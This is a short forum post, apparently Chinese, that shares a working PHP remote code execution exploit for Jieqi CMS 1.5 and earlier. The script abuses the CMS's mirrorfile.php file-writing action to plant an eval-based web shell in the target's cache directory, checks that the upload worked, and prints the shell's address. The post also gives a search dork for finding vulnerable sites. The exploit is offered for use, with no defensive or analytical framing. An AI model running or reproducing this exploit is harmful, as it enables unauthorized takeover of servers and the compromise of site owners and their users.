Jieqi cms v1.5 remote code execution exploit 's

作者：flyh4t

http://bbs.wolvez.org

转个exp出来迎接新年

<?php print_r(' +---------------------------------------------------------------------------+ Jieqi cms <= 1.5 remote code execution exploit by Flyh4t mail: [email protected] team: http://www.wolvez.org dork: "技术支持：杰奇网络" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 3) {     print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host:      target server (ip/hostname) path:      path to jieqi cms Example: php '.$argv[0].' localhost / +---------------------------------------------------------------------------+ ');     exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $url = 'http://'.$host.$path.'mirrorfile.php?filename=cache/flyh4t.php&action=writetofile&content='; $shell = 'http://'.$host.$path.'cache/flyh4t.php'; $cmd = urlencode("<?php @eval(/$_POST[wolvez]);?>test"); $str = file_get_contents($url.$cmd); if ( file_get_contents($shell) == 'test') exit("Expoilt Success!/nView Your shell:/t$shell/n"); else exit("Exploit Failed!/n"); ?>